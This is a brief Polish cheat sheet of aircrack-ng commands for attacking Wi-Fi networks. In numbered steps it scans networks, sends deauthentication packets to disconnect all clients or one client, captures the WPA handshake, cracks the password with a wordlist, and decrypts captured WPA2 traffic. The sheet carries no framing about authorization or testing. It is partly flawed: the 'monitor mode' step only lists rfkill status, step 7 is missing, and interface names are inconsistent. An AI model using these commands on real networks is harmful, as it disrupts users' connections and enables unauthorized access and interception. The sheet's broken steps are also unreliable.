1. Przejście w tryb monitorowania.
rfkill list |
2. Skanowanie sieci.
airodump-ng wlan0 |
3. Rozłączenie wszystkich klientów WLAN.
aireplay-ng --deauth 5 -a [MAC_AP] wlan0 |
4. Rozłączenie pojedyńczego klienta WLAN.
aireplay-ng --deauth 2 -a [MAC_AP] -c [MAC_klienta] wlan0 |
5. Zapisanie 4-way handshake sieci WLAN.
airodump-ng --bssid [MAC_AP] -c 11 -w nazwaPliku wlan0mon |
6. Proces odzyskiwania hasła.
aircrack-ng -w [nazwa_slownika] [nazwa_pliku.cap] |
8. Odszyfrowywanie przechwyconych pakietów (WPA2).
airdecap-ng -p HasloWLAN NazwaPliku.cap -e "SSID WLAN" |